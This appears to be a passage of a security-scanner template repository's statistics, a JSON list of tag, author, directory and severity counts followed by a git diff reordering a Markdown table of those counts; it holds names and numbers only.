{"name":"circontrorl","count":1},{"name":"jenzabar","count":1},{"name":"scs","count":1},{"name":"lansweeper","count":1},{"name":"uwsgi","count":1},{"name":"alertmanager","count":1},{"name":"nexusdb","count":1},{"name":"cve2007","count":1},{"name":"wamp","count":1},{"name":"ssltls","count":1},{"name":"mpsec","count":1},{"name":"pyramid","count":1},{"name":"hortonworks","count":1},{"name":"sentry","count":1},{"name":"exchange","count":1},{"name":"visionhub","count":1},{"name":"synnefo","count":1},{"name":"mautic","count":1},{"name":"zm","count":1},{"name":"fortigate","count":1},{"name":"clusterengine","count":1},{"name":"myucms","count":1},{"name":"openerp","count":1},{"name":"servicedesk","count":1},{"name":"axis","count":1},{"name":"klog","count":1},{"name":"kong","count":1},{"name":"jitsi","count":1},{"name":"svnserve","count":1},{"name":"biometrics","count":1},{"name":"k8s","count":1},{"name":"wuzhicms","count":1},{"name":"ulterius","count":1},{"name":"hasura","count":1},{"name":"spf","count":1},{"name":"razor","count":1},{"name":"mdb","count":1},{"name":"optiLink","count":1},{"name":"turbocrm","count":1},{"name":"symfony","count":1},{"name":"itop","count":1},{"name":"idemia","count":1},{"name":"ruby","count":1},{"name":"ssl","count":1},{"name":"webmin","count":1},{"name":"kafdrop","count":1},{"name":"gloo","count":1},{"name":"dvwa","count":1},{"name":"socomec","count":1},{"name":"parentlink","count":1},{"name":"acme","count":1},{"name":"shopware","count":1},{"name":"st","count":1},{"name":"pgadmin","count":1},{"name":"lancom","count":1},{"name":"fuelcms","count":1},{"name":"netrc","count":1},{"name":"webmodule-ee","count":1},{"name":"kyan","count":1},{"name":"wifisky","count":1},{"name":"firebase","count":1},{"name":"phpunit","count":1},{"name":"primetek","count":1},{"name":"vscode","count":1},{"name":"clockwatch","count":1},{"name":"nuuo","count":1},{"name":"chinaunicom","count":1},{"name":"bruteforce","count":1},{"name":"tika","count":1},{"name":"jenkin","count":1},{"name":"mobileiron","count":1},{"name":"etouch","count":1},{"name":"sqlite","count":1},{"name":"proftpd","count":1},{"name":"rabbitmq","count":1},{"name":"bookstack","count":1},{"name":"javamelody","count":1},{"name":"gateone","count":1},{"name":"beanshell","count":1},{"name":"opensmtpd","count":1},{"name":"sco","count":1},{"name":"extractor","count":1},{"name":"zookeeper","count":1},{"name":"centos","count":1},{"name":"zarafa","count":1},{"name":"wp-theme","count":1},{"name":"ricoh","count":1},{"name":"enum","count":1},{"name":"feifeicms","count":1},{"name":"wooyun","count":1},{"name":"javafaces","count":1},{"name":"octobercms","count":1},{"name":"ntopng","count":1},{"name":"cgi","count":1},{"name":"grails","count":1},{"name":"clave","count":1},{"name":"duomicms","count":1},{"name":"xff","count":1},{"name":"memcached","count":1},{"name":"xdcms","count":1},{"name":"rubedo","count":1},{"name":"dotnet","count":1},{"name":"npm","count":1},{"name":"panabit","count":1},{"name":"plc","count":1},{"name":"upload","count":1},{"name":"monitorix","count":1},{"name":"salesforce","count":1},{"name":"wso2","count":1},{"name":"svn","count":1},{"name":"2014","count":1},{"name":"geddy","count":1},{"name":"nedi","count":1},{"name":"gogs","count":1},{"name":"ecom","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"flink","count":1},{"name":"lanproxy","count":1},{"name":"comodo","count":1},{"name":"acexy","count":1},{"name":"finereport","count":1},{"name":"heroku","count":1},{"name":"episerver","count":1},{"name":"rmi","count":1},{"name":"tamronos","count":1},{"name":"calendarix","count":1},{"name":"moinmoin","count":1},{"name":"jfrog","count":1},{"name":"bitly","count":1},{"name":"tileserver","count":1},{"name":"fortiweb","count":1},{"name":"vsphere","count":1},{"name":"aura","count":1},{"name":"kubeflow","count":1},{"name":"druid","count":1},{"name":"aspnuke","count":1},{"name":"linkedin","count":1},{"name":"avalanche","count":1},{"name":"upnp","count":1},{"name":"glances","count":1},{"name":"phalcon","count":1},{"name":"rhymix","count":1},{"name":"tensorboard","count":1},{"name":"saltapi","count":1},{"name":"geutebruck","count":1},{"name":"floc","count":1},{"name":"cve2010","count":1},{"name":"appweb","count":1},{"name":"fedora","count":1},{"name":"csod","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"jsf","count":1},{"name":"grav","count":1},{"name":"cobub","count":1},{"name":"akamai","count":1},{"name":"mirai","count":1},{"name":"netis","count":1},{"name":"alibaba","count":1},{"name":"wiki","count":1},{"name":"payara","count":1},{"name":"igs","count":1},{"name":"zeroshell","count":1},{"name":"gridx","count":1},{"name":"plone","count":1},{"name":"jnoj","count":1},{"name":"smartsense","count":1},{"name":"status","count":1},{"name":"fortinet","count":1},{"name":"mediumish","count":1},{"name":"krweb","count":1},{"name":"nordex","count":1},{"name":"tpshop","count":1},{"name":"huijietong","count":1},{"name":"k8","count":1},{"name":"stem","count":1},{"name":"phpinfo","count":1},{"name":"crm","count":1},{"name":"realteo","count":1},{"name":"empirecms","count":1},{"name":"hadoop","count":1},{"name":"spidercontrol","count":1},{"name":"ioncube","count":1},{"name":"fortilogger","count":1},{"name":"embedthis","count":1},{"name":"landrayoa","count":1},{"name":"opencast","count":1},{"name":"triconsole","count":1},{"name":"opentsdb","count":1},{"name":"webadmin","count":1},{"name":"trilithic","count":1},{"name":"seacms","count":1},{"name":"targa","count":1},{"name":"discourse","count":1},{"name":"interlib","count":1},{"name":"sprintful","count":1},{"name":"starttls","count":1},{"name":"pacsone","count":1},{"name":"dotnetnuke","count":1},{"name":"javascript","count":1},{"name":"dvr","count":1},{"name":"nsasg","count":1},{"name":"doh","count":1},{"name":"labtech","count":1},{"name":"emby","count":1},{"name":"mailchimp","count":1},{"name":"diris","count":1},{"name":"dom","count":1},{"name":"totaljs","count":1},{"name":"pulsesecure","count":1},{"name":"keenetic","count":1},{"name":"linkerd","count":1},{"name":"nette","count":1},{"name":"zte","count":1},{"name":"kerbynet","count":1},{"name":"mongoshake","count":1},{"name":"jsp","count":1},{"name":"shopxo","count":1},{"name":"azure","count":1},{"name":"codeigniter","count":1},{"name":"weiphp","count":1},{"name":"dompdf","count":1},{"name":"flash","count":1},{"name":"postmessage","count":1},{"name":"htmli","count":1},{"name":"avtech","count":1},{"name":"zimbra","count":1},{"name":"mongo","count":1},{"name":"plastic","count":1},{"name":"wazuh","count":1},{"name":"rfi","count":1},{"name":"soar","count":1},{"name":"gitlist","count":1},{"name":"woocomernce","count":1},{"name":"dlogin","count":1},{"name":"traefik","count":1},{"name":"goahead","count":1},{"name":"ns","count":1},{"name":"plugin","count":1},{"name":"lotuscms","count":1},{"name":"opensns","count":1},{"name":"anchorcms","count":1},{"name":"email","count":1},{"name":"eyou","count":1},{"name":"xunchi","count":1},{"name":"db","count":1},{"name":"redhat","count":1},{"name":"viewlinc","count":1},{"name":"landray","count":1},{"name":"zmanda","count":1},{"name":"backdoor","count":1},{"name":"mara","count":1},{"name":"timesheet","count":1},{"name":"nuxeo","count":1},{"name":"timeclock","count":1},{"name":"openstack","count":1},{"name":"domxss","count":1},{"name":"bullwark","count":1},{"name":"horde","count":1},{"name":"tensorflow","count":1},{"name":"liferay","count":1},{"name":"adminer","count":1},{"name":"alerta","count":1},{"name":"cse","count":1},{"name":"yachtcontrol","count":1},{"name":"rsyncd","count":1},{"name":"ilo4","count":1},{"name":"jeewms","count":1},{"name":"octoprint","count":1},{"name":"arl","count":1},{"name":"opm","count":1},{"name":"ems","count":1},{"name":"powercreator","count":1},{"name":"cve2005","count":1},{"name":"webui","count":1},{"name":"xml","count":1},{"name":"wildfly","count":1},{"name":"enumeration","count":1},{"name":"openrestry","count":1},{"name":"redis","count":1},{"name":"tenda","count":1},{"name":"mantisbt","count":1},{"name":"haproxy","count":1},{"name":"mysql","count":1},{"name":"springframework","count":1},{"name":"moin","count":1},{"name":"mcafee","count":1},{"name":"drone","count":1},{"name":"swagger","count":1},{"name":"b2evolution","count":1},{"name":"cloudinary","count":1},{"name":"favicon","count":1},{"name":"rdp","count":1},{"name":"skywalking","count":1},{"name":"robomongo","count":1},{"name":"harbor","count":1},{"name":"bolt","count":1},{"name":"servicenow","count":1},{"name":"codemeter","count":1},{"name":"jmx","count":1},{"name":"metinfo","count":1},{"name":"concrete","count":1},{"name":"cocoon","count":1},{"name":"setup","count":1},{"name":"rujjie","count":1},{"name":"spectracom","count":1},{"name":"node","count":1},{"name":"portainer","count":1},{"name":"ambari","count":1},{"name":"subrion","count":1},{"name":"rmc","count":1},{"name":"node-red-dashboard","count":1},{"name":"fiori","count":1},{"name":"faraday","count":1},{"name":"ec2","count":1},{"name":"bash","count":1},{"name":"nps","count":1},{"name":"netsweeper","count":1},{"name":"ganglia","count":1},{"name":"szhe","count":1},{"name":"sidekiq","count":1},{"name":"livezilla","count":1},{"name":"xiuno","count":1},{"name":"blue-ocean","count":1},{"name":"jquery","count":1},{"name":"darkstat","count":1},{"name":"discord","count":1},{"name":"sarg","count":1},{"name":"circontrol","count":1},{"name":"webftp","count":1},{"name":"nomad","count":1},{"name":"zenario","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":79},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":12},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"wdahlenb","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"melbadry9","count":7},{"name":"r3dg33k","count":7},{"name":"that_juan_","count":7},{"name":"dr_set","count":7},{"name":"oppsec","count":7},{"name":"techryptic (@tech)","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"puzzlepeaches","count":5},{"name":"ganofins","count":5},{"name":"caspergn","count":5},{"name":"panch0r3d","count":5},{"name":"github.com/its0x08","count":4},{"name":"meme-lord","count":4},{"name":"nodauf","count":4},{"name":"rootxharsh","count":4},{"name":"e_schultze_","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"fyoorer","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"joanbono","count":3},{"name":"kophjager007","count":3},{"name":"shine","count":3},{"name":"zomsop82","count":2},{"name":"udit_thakkur","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"lu4nx","count":2},{"name":"shifacyclewala","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"gevakun","count":2},{"name":"dheerajmadhukar","count":2},{"name":"jarijaas","count":2},{"name":"hetroublemakr","count":2},{"name":"0xsapra","count":2},{"name":"random-robbie","count":2},{"name":"ehsahil","count":2},{"name":"kiblyn11","count":2},{"name":"joeldeleep","count":2},{"name":"0xcrypto","count":2},{"name":"swissky","count":2},{"name":"0xelkomy","count":2},{"name":"mavericknerd","count":2},{"name":"moritz nentwig","count":2},{"name":"foulenzer","count":2},{"name":"ree4pwn","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"manas_harsh","count":2},{"name":"amsda","count":2},{"name":"pxmme1337","count":2},{"name":"elsfa7110","count":2},{"name":"vavkamil","count":2},{"name":"bsysop","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"0xrudra","count":2},{"name":"x1m_martijn","count":2},{"name":"unstabl3","count":2},{"name":"bp0lr","count":2},{"name":"lotusdll","count":2},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"iampritam","count":1},{"name":"fopina","count":1},{"name":"bjhulst","count":1},{"name":"akshansh","count":1},{"name":"geraldino2","count":1},{"name":"_harleo","count":1},{"name":"notsoevilweasel","count":1},{"name":"sy3omda","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"_c0wb0y_","count":1},{"name":"shifacyclewla","count":1},{"name":"0h1in9e","count":1},{"name":"mubassirpatel","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"j33n1k4","count":1},{"name":"thevillagehacker","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"knassar702","count":1},{"name":"becivells","count":1},{"name":"sullo","count":1},{"name":"vsh00t","count":1},{"name":"johnjhacking","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"th3.d1p4k","count":1},{"name":"manuelbua","count":1},{"name":"kabirsuda","count":1},{"name":"raesene","count":1},{"name":"bad5ect0r","count":1},{"name":"deena","count":1},{"name":"s1r1u5_","count":1},{"name":"willd96","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"0ut0fb4nd","count":1},{"name":"abison_binoy","count":1},{"name":"rojanrijal","count":1},{"name":"pdp","count":1},{"name":"rtcms","count":1},{"name":"qlkwej","count":1},{"name":"pudsec","count":1},{"name":"noamrathaus","count":1},{"name":"toufik airane","count":1},{"name":"alex","count":1},{"name":"zandros0","count":1},{"name":"@dwisiswant0","count":1},{"name":"0xtavian","count":1},{"name":"remonsec","count":1},{"name":"cookiehanhoan","count":1},{"name":"mhdsamx","count":1},{"name":"luskabol","count":1},{"name":"mohammedsaneem","count":1},{"name":"juicypotato1","count":1},{"name":"omarkurt","count":1},{"name":"sshell","count":1},{"name":"_generic_human_","count":1},{"name":"jeya seelan","count":1},{"name":"fmunozs","count":1},{"name":"nytr0gen","count":1},{"name":"kareemse1im","count":1},{"name":"blckraven","count":1},{"name":"exploitation","count":1},{"name":"52971","count":1},{"name":"dogasantos","count":1},{"name":"gboddin","count":1},{"name":"zhenwarx","count":1},{"name":"apt-mirror","count":1},{"name":"luci","count":1},{"name":"dawid czarnecki","count":1},{"name":"ilovebinbash","count":1},{"name":"yavolo","count":1},{"name":"fabaff","count":1},{"name":"0xrod","count":1},{"name":"affix","count":1},{"name":"yashgoti","count":1},{"name":"idealphase","count":1},{"name":"koti2","count":1},{"name":"tim_koopmans","count":1},{"name":"absshax","count":1},{"name":"kurohost","count":1},{"name":"andirrahmani1","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"b4uh0lz","count":1},{"name":"tirtha_mandal","count":1},{"name":"divya_mudgal","count":1},{"name":"johnk3r","count":1},{"name":"daviey","count":1},{"name":"its0x08","count":1},{"name":"c3l3si4n","count":1},{"name":"chron0x","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"furkansenan","count":1},{"name":"mah3sec_","count":1},{"name":"sicksec","count":1},{"name":"bolli95","count":1},{"name":"alph4byt3","count":1},{"name":"bing0o","count":1},{"name":"elmahdi","count":1},{"name":"_darrenmartyn","count":1},{"name":"shelld3v","count":1},{"name":"hanlaomo","count":1},{"name":"ipanda","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ahmed sherif","count":1},{"name":"alperenkesk","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"defr0ggy","count":1},{"name":"streetofhackerr007","count":1},{"name":"undefl0w","count":1},{"name":"regala_","count":1},{"name":"akash.c","count":1},{"name":"naglinagli","count":1},{"name":"patralos","count":1},{"name":"hakluke","count":1},{"name":"ajaysenr","count":1},{"name":"ooooooo_q","count":1},{"name":"berkdusunur","count":1},{"name":"ohlinge","count":1},{"name":"soyelmago","count":1},{"name":"arcc","count":1},{"name":"schniggie","count":1},{"name":"gal nagli","count":1},{"name":"dudez","count":1},{"name":"whynotke","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"flag007","count":1},{"name":"micha3lb3n","count":1},{"name":"ldionmarcil","count":1},{"name":"vzamanillo","count":1},{"name":"taielab","count":1},{"name":"alifathi-h1","count":1},{"name":"shreyapohekar","count":1},{"name":"d0rkerdevil","count":1},{"name":"r3naissance","count":1},{"name":"rodnt","count":1},{"name":"ringo","count":1},{"name":"smaranchand","count":1},{"name":"sickwell","count":1},{"name":"wabafet","count":1},{"name":"w4cky_","count":1},{"name":"co0nan","count":1},{"name":"thezakman","count":1},{"name":"yashanand155","count":1},{"name":"nkxxkn","count":1}],"directory":[{"name":"cves","count":470},{"name":"vulnerabilities","count":232},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":395},{"name":"medium","count":313},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2127d6d969..46d6b5181e 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -22,580 +22,580 @@ | file | 42 | cyllective | 11 | | | | | | | | unauth | 39 | random_robbie | 10 | | | | | | | | iot | 33 | righettod | 9 | | | | | | | -| network | 32 | iamthefrogy | 8 | | | | | | | +| network | 32 | wdahlenb | 8 | | | | | | | | sqli | 29 | hackergautam | 8 | | | | | | | -| oracle | 29 | wdahlenb | 8 | | | | | | | -| workflow | 28 | nadino | 8 | | | | | | | -| misc | 27 | aashiq | 8 | | | | | | | -| atlassian | 26 | randomstr1ng | 7 | | | | | | | -| jira | 25 | oppsec | 7 | | | | | | | -| ssrf | 25 | dr_set | 7 | | | | | | | -| oob | 24 | techryptic (@tech) | 7 | | | | | | | -| logs | 24 | r3dg33k | 7 | | | | | | | -| disclosure | 24 | that_juan_ | 7 | | | | | | | +| oracle | 29 | nadino | 8 | | | | | | | +| workflow | 28 | aashiq | 8 | | | | | | | +| misc | 27 | iamthefrogy | 8 | | | | | | | +| atlassian | 26 | harshbothra_ | 7 | | | | | | | +| ssrf | 25 | randomstr1ng | 7 | | | | | | | +| jira | 25 | techryptic (@tech) | 7 | | | | | | | +| disclosure | 24 | oppsec | 7 | | | | | | | +| oob | 24 | r3dg33k | 7 | | | | | | | +| logs | 24 | emadshanab | 7 | | | | | | | | redirect | 20 | 0x240x23elu | 7 | | | | | | | -| aem | 18 | melbadry9 | 7 | | | | | | | -| listing | 15 | emadshanab | 7 | | | | | | | -| cisco | 15 | harshbothra_ | 7 | | | | | | | -| cve2016 | 14 | philippedelteil | 6 | | | | | | | -| sap | 14 | __fazal | 6 | | | | | | | +| aem | 18 | dr_set | 7 | | | | | | | +| listing | 15 | that_juan_ | 7 | | | | | | | +| cisco | 15 | melbadry9 | 7 | | | | | | | +| sap | 14 | philippedelteil | 6 | | | | | | | +| cve2016 | 14 | __fazal | 6 | | | | | | | +| debug | 13 | yanyun | 5 | | | | | | | +| struts | 13 | panch0r3d | 5 | | | | | | | | misconfig | 13 | puzzlepeaches | 5 | | | | | | | -| fuzz | 13 | caspergn | 5 | | | | | | | -| cve2015 | 13 | panch0r3d | 5 | | | | | | | -| struts | 13 | pentest_swissky | 5 | | | | | | | -| debug | 13 | ganofins | 5 | | | | | | | -| android | 12 | yanyun | 5 | | | | | | | -| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | -| auth-bypass | 11 | nodauf | 4 | | | | | | | -| springboot | 11 | e_schultze_ | 4 | | | | | | | -| zoho | 11 | meme-lord | 4 | | | | | | | -| dns | 11 | iamnoooob | 4 | | | | | | | -| cve2011 | 10 | rootxharsh | 4 | | | | | | | -| devops | 10 | xelkomy | 4 | | | | | | | -| jenkins | 9 | binaryfigments | 3 | | | | | | | -| dlink | 9 | fyoorer | 3 | | | | | | | -| cve2012 | 9 | f1tz | 3 | | | | | | | -| magento | 9 | 0w4ys | 3 | | | | | | | -| adobe | 8 | impramodsargar | 3 | | | | | | | -| ftp | 8 | shine | 3 | | | | | | | -| php | 8 | z3bd | 3 | | | | | | | -| airflow | 8 | thomas_from_offensity | 3 | | | | | | | -| aws | 8 | kophjager007 | 3 | | | | | | | -| cve2013 | 8 | joanbono | 3 | | | | | | | -| gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | -| cnvd | 8 | tess | 3 | | | | | | | -| cve2014 | 7 | hetroublemakr | 2 | | | | | | | -| joomla | 7 | mavericknerd | 2 | | | | | | | -| vmware | 7 | ree4pwn | 2 | | | | | | | -| scada | 7 | x1m_martijn | 2 | | | | | | | -| xxe | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| cms | 6 | incogbyte | 2 | | | | | | | -| backup | 6 | vavkamil | 2 | | | | | | | -| rails | 6 | gevakun | 2 | | | | | | | -| google | 6 | manas_harsh | 2 | | | | | | | -| api | 6 | afaq | 2 | | | | | | | -| nginx | 6 | random-robbie | 2 | | | | | | | -| citrix | 6 | kiblyn11 | 2 | | | | | | | -| rconfig | 6 | moritz nentwig | 2 | | | | | | | -| dell | 5 | amsda | 2 | | | | | | | -| login | 5 | lu4nx | 2 | | | | | | | -| phpmyadmin | 5 | bp0lr | 2 | | | | | | | -| iis | 5 | unstabl3 | 2 | | | | | | | -| ssti | 5 | lotusdll | 2 | | | | | | | -| confluence | 5 | dheerajmadhukar | 2 | | | | | | | -| jetty | 5 | udit_thakkur | 2 | | | | | | | -| headless | 5 | 0xcrypto | 2 | | | | | | | -| java | 5 | 0xrudra | 2 | | | | | | | -| solr | 5 | emenalf | 2 | | | | | | | -| lucee | 5 | elsfa7110 | 2 | | | | | | | -| circarlife | 5 | davidmckennirey | 2 | | | | | | | -| laravel | 5 | shifacyclewala | 2 | | | | | | | -| ruijie | 5 | swissky | 2 | | | | | | | -| drupal | 5 | jarijaas | 2 | | | | | | | -| jolokia | 4 | bsysop | 2 | | | | | | | -| artifactory | 4 | zomsop82 | 2 | | | | | | | -| hongdian | 4 | pxmme1337 | 2 | | | | | | | -| thinkcmf | 4 | 0xsapra | 2 | | | | | | | -| ibm | 4 | 0xelkomy | 2 | | | | | | | -| netgear | 4 | 0xprial | 2 | | | | | | | -| asp | 4 | joeldeleep | 2 | | | | | | | -| moodle | 4 | randomrobbie | 2 | | | | | | | -| vpn | 4 | foulenzer | 2 | | | | | | | -| traversal | 4 | ehsahil | 2 | | | | | | | -| nodejs | 4 | idealphase | 1 | | | | | | | -| tomcat | 4 | ajaysenr | 1 | | | | | | | -| webserver | 4 | bad5ect0r | 1 | | | | | | | -| elastic | 4 | chron0x | 1 | | | | | | | -| thinkphp | 4 | mhdsamx | 1 | | | | | | | -| samsung | 4 | alperenkesk | 1 | | | | | | | -| cve2009 | 4 | divya_mudgal | 1 | | | | | | | -| magmi | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| solarwinds | 4 | 0xrod | 1 | | | | | | | -| fileupload | 4 | remonsec | 1 | | | | | | | -| django | 4 | j3ssie/geraldino2 | 1 | | | | | | | -| docker | 4 | alifathi-h1 | 1 | | | | | | | -| router | 4 | omarkurt | 1 | | | | | | | -| mongodb | 3 | 52971 | 1 | | | | | | | -| backups | 3 | bolli95 | 1 | | | | | | | -| ssh | 3 | dogasantos | 1 | | | | | | | -| caucho | 3 | tirtha_mandal | 1 | | | | | | | -| windows | 3 | @dwisiswant0 | 1 | | | | | | | -| r-seenet | 3 | pdp | 1 | | | | | | | -| slack | 3 | notsoevilweasel | 1 | | | | | | | -| fanruan | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| nacos | 3 | w4cky_ | 1 | | | | | | | -| ebs | 3 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| openssh | 3 | ahmed sherif | 1 | | | | | | | -| bypass | 3 | rtcms | 1 | | | | | | | -| amazon | 3 | aceseven (digisec360) | 1 | | | | | | | -| lfr | 3 | jeya seelan | 1 | | | | | | | -| log | 3 | becivells | 1 | | | | | | | -| microstrategy | 3 | johnk3r | 1 | | | | | | | -| springcloud | 3 | streetofhackerr007 | 1 | | | | | | | -| fpd | 3 | mubassirpatel | 1 | | | | | | | -| terramaster | 3 | affix | 1 | | | | | | | -| deserialization | 3 | dudez | 1 | | | | | | | -| resin | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| oa | 3 | rojanrijal | 1 | | | | | | | -| grafana | 3 | hanlaomo | 1 | | | | | | | -| kafka | 3 | alph4byt3 | 1 | | | | | | | -| git | 3 | mohammedsaneem | 1 | | | | | | | -| dedecms | 3 | andirrahmani1 | 1 | | | | | | | -| crlf | 3 | ilovebinbash | 1 | | | | | | | -| ofbiz | 3 | whynotke | 1 | | | | | | | -| kubernetes | 3 | alex | 1 | | | | | | | -| nosqli | 3 | c3l3si4n | 1 | | | | | | | -| printer | 3 | taielab | 1 | | | | | | | -| vbulletin | 3 | cookiehanhoan | 1 | | | | | | | -| icewarp | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| nexus | 2 | abison_binoy | 1 | | | | | | | -| service | 2 | smaranchand | 1 | | | | | | | -| bigip | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| mail | 2 | akash.c | 1 | | | | | | | -| dos | 2 | juicypotato1 | 1 | | | | | | | -| smtp | 2 | luci | 1 | | | | | | | -| leak | 2 | nytr0gen | 1 | | | | | | | -| hashicorp | 2 | vsh00t | 1 | | | | | | | -| frp | 2 | j33n1k4 | 1 | | | | | | | -| mida | 2 | defr0ggy | 1 | | | | | | | -| splunk | 2 | bing0o | 1 | | | | | | | -| httpd | 2 | thezakman | 1 | | | | | | | -| kibana | 2 | deena | 1 | | | | | | | -| zhiyuan | 2 | sy3omda | 1 | | | | | | | -| saltstack | 2 | knassar702 | 1 | | | | | | | -| rockethchat | 2 | noamrathaus | 1 | | | | | | | -| maian | 2 | _harleo | 1 | | | | | | | -| globalprotect | 2 | sullo | 1 | | | | | | | -| kentico | 2 | zandros0 | 1 | | | | | | | -| exposures | 2 | apt-mirror | 1 | | | | | | | -| cve2008 | 2 | dawid czarnecki | 1 | | | | | | | -| intrusive | 2 | manuelbua | 1 | | | | | | | -| hp | 2 | naglinagli | 1 | | | | | | | -| rstudio | 2 | ooooooo_q | 1 | | | | | | | -| flir | 2 | fopina | 1 | | | | | | | -| plesk | 2 | regala_ | 1 | | | | | | | -| rockmongo | 2 | sicksec | 1 | | | | | | | -| yapi | 2 | pudsec | 1 | | | | | | | -| injection | 2 | wabafet | 1 | | | | | | | -| activemq | 2 | ratnadip gajbhiye | 1 | | | | | | | -| sonicwall | 2 | soyelmago | 1 | | | | | | | -| sonarqube | 2 | ipanda | 1 | | | | | | | -| jboss | 2 | patralos | 1 | | | | | | | -| fortios | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| openfire | 2 | 0h1in9e | 1 | | | | | | | -| pega | 2 | thevillagehacker | 1 | | | | | | | -| idrac | 2 | yashanand155 | 1 | | | | | | | -| nagios | 2 | gboddin | 1 | | | | | | | -| nextjs | 2 | flag007 | 1 | | | | | | | -| ecology | 2 | schniggie | 1 | | | | | | | -| cache | 2 | sickwell | 1 | | | | | | | -| chamilo | 2 | mah3sec_ | 1 | | | | | | | -| paloalto | 2 | fabaff | 1 | | | | | | | -| hjtcloud | 2 | sshell | 1 | | | | | | | -| strapi | 2 | @github.com/defr0ggy | 1 | | | | | | | -| ucmdb | 2 | yashgoti | 1 | | | | | | | -| bitrix | 2 | s1r1u5_ | 1 | | | | | | | -| xxljob | 2 | _c0wb0y_ | 1 | | | | | | | -| sharepoint | 2 | absshax | 1 | | | | | | | -| voipmonitor | 2 | kareemse1im | 1 | | | | | | | -| showdoc | 2 | micha3lb3n | 1 | | | | | | | -| natshell | 2 | shifacyclewla | 1 | | | | | | | -| glassfish | 2 | toufik airane | 1 | | | | | | | -| shellshock | 2 | ringo | 1 | | | | | | | -| keycloak | 2 | co0nan | 1 | | | | | | | -| oauth | 2 | kabirsuda | 1 | | | | | | | -| waf | 2 | hakluke | 1 | | | | | | | -| huawei | 2 | kurohost | 1 | | | | | | | -| wordfence | 2 | exploitation | 1 | | | | | | | -| microsoft | 2 | yavolo | 1 | | | | | | | -| odoo | 2 | nkxxkn | 1 | | | | | | | -| hpe | 2 | its0x08 | 1 | | | | | | | -| couchdb | 2 | berkdusunur | 1 | | | | | | | -| webcam | 2 | ldionmarcil | 1 | | | | | | | -| coldfusion | 2 | rodnt | 1 | | | | | | | -| spark | 2 | willd96 | 1 | | | | | | | -| trixbox | 2 | th3.d1p4k | 1 | | | | | | | -| seeyon | 2 | shreyapohekar | 1 | | | | | | | -| vrealize | 2 | undefl0w | 1 | | | | | | | -| jellyfin | 2 | luskabol | 1 | | | | | | | -| openam | 2 | elmahdi | 1 | | | | | | | -| emerge | 2 | gal nagli | 1 | | | | | | | -| smb | 2 | d0rkerdevil | 1 | | | | | | | -| zabbix | 2 | bjhulst | 1 | | | | | | | +| cve2015 | 13 | caspergn | 5 | | | | | | | +| fuzz | 13 | pentest_swissky | 5 | | | | | | | +| weblogic | 12 | ganofins | 5 | | | | | | | +| android | 12 | iamnoooob | 4 | | | | | | | +| dns | 11 | xelkomy | 4 | | | | | | | +| 